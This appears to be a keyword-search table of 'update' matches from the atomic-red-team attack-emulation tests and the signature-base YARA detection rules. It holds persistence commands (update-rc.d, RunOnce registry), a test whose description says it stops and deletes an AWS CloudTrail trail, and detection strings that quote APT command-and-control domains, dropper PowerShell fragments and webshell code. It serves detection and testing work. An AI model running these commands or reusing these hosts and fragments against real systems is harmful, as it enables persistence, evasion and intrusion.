if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i ‘ID=”centos”’) ]; then chkconfig T1543.002 on ; else echo “Please run this test on Ubnutu , kali OR centos” ; fi ; |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1547.001.md |
| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1553.004.md |
update-ca-trust |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1553.004.md |
echo sudo update-ca-certificates |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.001.md |
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.008.md |
Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail |
MIT License. © 2018 Red Canary |
| atomic-red-team |
T1562.008.md |
aws cloudtrail update-trail –name #{cloudtrail_name} –s3-bucket-name #{s3_bucket_name} –is-multi-region-trail –region #{region} |
MIT License. © 2018 Red Canary |
| signature-base |
apt_apt10.yar |
$c2_897 = “update.yourtrap.com” ascii |
CC BY-NC 4.0 |
| signature-base |
apt_bigbang.yar |
$x7 = “VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu” fullword ascii /* base64 encoded string ‘Update prog: There is no old file in temp.’ */ |
CC BY-NC 4.0 |
| signature-base |
apt_danti_svcmondr.yar |
$s4 = “\update.dat” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_derusbi.yar |
$s2 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_dragonfly.yar |
$s1 = “\Update\Temp\ufiles.txt” fullword wide |
CC BY-NC 4.0 |
| signature-base |
apt_glassRAT.yar |
$s2 = “update.dll” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_irongate.yar |
description = “Detects a PyInstaller file named update.exe as mentioned in the IronGate APT” |
CC BY-NC 4.0 |
| signature-base |
apt_irontiger_trendmicro.yar |
$str2 = “(can not update server recently)!” nocase wide ascii |
CC BY-NC 4.0 |
| signature-base |
apt_keyboys.yar |
/* Update March 2018 */ |
CC BY-NC 4.0 |
| signature-base |
apt_khrat.yar |
$x1 = “http.open "POST", "http://update.upload-dropbox[.]com/docs/tz/GetProcess.php",False,"","" “ fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_lazarus_jun18.yar |
$s3 = “update” fullword wide /* Goodware String - occured 254 times */ |
CC BY-NC 4.0 |
| signature-base |
apt_middle_east_talosreport.yar |
$s5 = “update software online” fullword wide |
CC BY-NC 4.0 |
| signature-base |
apt_nk_inkysquid.yar |
$magic1 = “‘https://update.microsoft.com/driverupdate?id=” ascii wide |
CC BY-NC 4.0 |
| signature-base |
apt_oilrig.yar |
$x1 = “Get-Content $env:Public\Libraries\update.vbs) -replace” ascii |
CC BY-NC 4.0 |
| signature-base |
apt_oilrig.yar |
$x3 = “Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\update.vbs")” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_oilrig.yar |
$x1 = “wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace ‘__’,(Get-Random) | Set-C” ascii |
CC BY-NC 4.0 |
| signature-base |
apt_oilrig.yar |
$x2 = “Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\update.vbs")” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_op_cloudhopper.yar |
$s2 = “rundll32.exe "%s", UnInstall /update %s” fullword wide |
CC BY-NC 4.0 |
| signature-base |
apt_putterpanda.yar |
$s0 = “http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?” fullword ascii /* PEStudio Blacklist: strings / / score: ‘28.01’ */ |
CC BY-NC 4.0 |
| signature-base |
apt_putterpanda.yar |
$s1 = “http://update.konamidata.com/test/zl/sophos/td/index.dat?” fullword ascii /* PEStudio Blacklist: strings / / score: ‘28.01’ */ |
CC BY-NC 4.0 |
| signature-base |
apt_reaver_sunorcal.yar |
$s3 = “~Update.lnk” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_sandworm_centreon.yar |
$ = “App.Update” |
CC BY-NC 4.0 |
| signature-base |
apt_sandworm_centreon.yar |
$typo3 = “Error.Can’t update app! Not enough update archive.” |
CC BY-NC 4.0 |
| signature-base |
apt_sandworm_cyclops_blink.yar |
description = “Detects the code bytes used to check commands sent to module ID 0x51 and notable strings relating to the Cyclops Blink update process” |
CC BY-NC 4.0 |
| signature-base |
apt_sednit_delphidownloader.yar |
Reference: https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ |
CC BY-NC 4.0 |
| signature-base |
apt_sednit_delphidownloader.yar |
reference = “https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/” |
CC BY-NC 4.0 |
| signature-base |
apt_snaketurla_osx.yar |
$s2 = “$TARGET_PATH2/com.adobe.update.plist” ascii |
CC BY-NC 4.0 |
| signature-base |
apt_sofacy_xtunnel_bundestag.yar |
$s6 = “.update.adobeincorp.com” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_ta17_293A.yar |
$s1 = “-t time - use the time specified to update the access and modification times” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
description = “Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s0 = “update.hancominc.com” fullword wide |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s5 = “binary.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s25 = “long.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s26 = “longlong.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s28 = “longshadow.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s29 = “longykcai.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s30 = “lostself.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s38 = “mtc.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s47 = “shadow.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s52 = “update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s53 = “update.deepsoftupdate.com” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s54 = “update.hancominc.com” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s55 = “update.micr0soft.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s56 = “update.pchomeserver.com” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s65 = “www.trendmicro-update.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s66 = “www.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_threatgroup_3390.yar |
$s68 = “ykcai.update-onlines.org” |
CC BY-NC 4.0 |
| signature-base |
apt_turbo_campaign.yar |
$sc_2 = “update.microsoft.com” wide ascii |
CC BY-NC 4.0 |
| signature-base |
apt_turla_mosquito.yar |
$s4 = “Microsoft Update” fullword wide |
CC BY-NC 4.0 |
| signature-base |
apt_waterbear.yar |
$s1 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_waterbear.yar |
$b2 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_wildneutron.yar |
$s3 = “Driver Update and remove for Windows x64 or x86_32” fullword wide /* PEStudio Blacklist: strings / / score: ‘17.00’ */ |
CC BY-NC 4.0 |
| signature-base |
apt_wildneutron.yar |
$s4 = “Realtek HD Audio Update and remove driver Tool” fullword wide /* PEStudio Blacklist: strings / / score: ‘16.00’ */ |
CC BY-NC 4.0 |
| signature-base |
apt_winnti.yar |
description = “Detects a Winnti malware - Update.dll” |
CC BY-NC 4.0 |
| signature-base |
apt_winnti.yar |
$s2 = “Update.dll” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
apt_zxshell.yar |
$x3 = “downfile -d c:\windows\update.exe” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
cn_pentestset_tools.yar |
$s1 = “update [dv_user] set usergroupid=1 where userid=2;–” fullword ascii /* PEStudio Blacklist: strings */ |
CC BY-NC 4.0 |
| signature-base |
crime_bad_patch.yar |
$x8 = “ :Old - update patch and check anti-virus.. “ fullword wide |
CC BY-NC 4.0 |
| signature-base |
crime_fireball.yar |
$s6 = “UPDATE OVERWRITE” fullword wide |
CC BY-NC 4.0 |
| signature-base |
crime_icedid.yar |
$string6 = “update” fullword |
CC BY-NC 4.0 |
| signature-base |
crime_malware_set_oct16.yar |
$s4 = “VXBkYXRlIEVSUk9S” fullword ascii /* base64 encoded string ‘Update ERROR’ */ |
CC BY-NC 4.0 |
| signature-base |
crime_socgholish.yar |
description = “Detects SocGholish fake update Javascript files 22.02.2022” |
CC BY-NC 4.0 |
| signature-base |
gen_cn_hacktools.yar |
$s1 = “@members.3322.net/dyndns/update?system=dyndns&hostname=” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
gen_cn_hacktools.yar |
$s3 = “@ddns.oray.com/ph/update?hostname=” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
gen_crunchrat.yar |
$s5 = “/update.php” fullword wide |
CC BY-NC 4.0 |
| signature-base |
gen_malware_set_qa.yar |
description = “VT Research QA uploaded malware - file update.exe” |
CC BY-NC 4.0 |
| signature-base |
gen_malware_set_qa.yar |
$x6 = “BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir…|” fullword ascii |
CC BY-NC 4.0 |
| signature-base |
gen_merlin_agent.yar |
$x2 = “[-]Connecting to web server at %s to update agent configuration information.” |
CC BY-NC 4.0 |
| signature-base |
mal_codecov_hack.yar |
reference = “https://about.codecov.io/security-update/” |
CC BY-NC 4.0 |
| signature-base |
mal_passwordstate_backdoor.yar |
reference = “https://thehackernews.com/2021/04/passwordstate-password-manager-update.html” |
CC BY-NC 4.0 |
| signature-base |
spy_equation_fiveeyes.yar |
/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */ |
CC BY-NC 4.0 |
| signature-base |
spy_regin_fiveeyes.yar |
/* Update 27.11.14 */ |
CC BY-NC 4.0 |
| signature-base |
thor-hacktools.yar |
We will frequently update this file with new rules rated TLP:WHITE |
CC BY-NC 4.0 |
| signature-base |
thor-webshells.yar |
/* Update from hackers tool pack */ |
CC BY-NC 4.0 |
| signature-base |
thor-webshells.yar |
/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */ |
CC BY-NC 4.0 |
| signature-base |
thor-webshells.yar |
$s3 = “ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER” |
CC BY-NC 4.0 |
| signature-base |
vul_dell_bios_upd_driver.yar |
description = “Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it’s usual location is in the C:\Windows\Temp folder” |
CC BY-NC 4.0 |
| signature-base |
yara_mixed_ext_vars.yar |
$str4 = “Winds Update” nocase wide ascii fullword |
CC BY-NC 4.0 |
| signature-base |
yara_mixed_ext_vars.yar |
uint16(0) == 0x5a4d and filesize < 1000KB and all of them and filename == “update.exe” |
CC BY-NC 4.0 |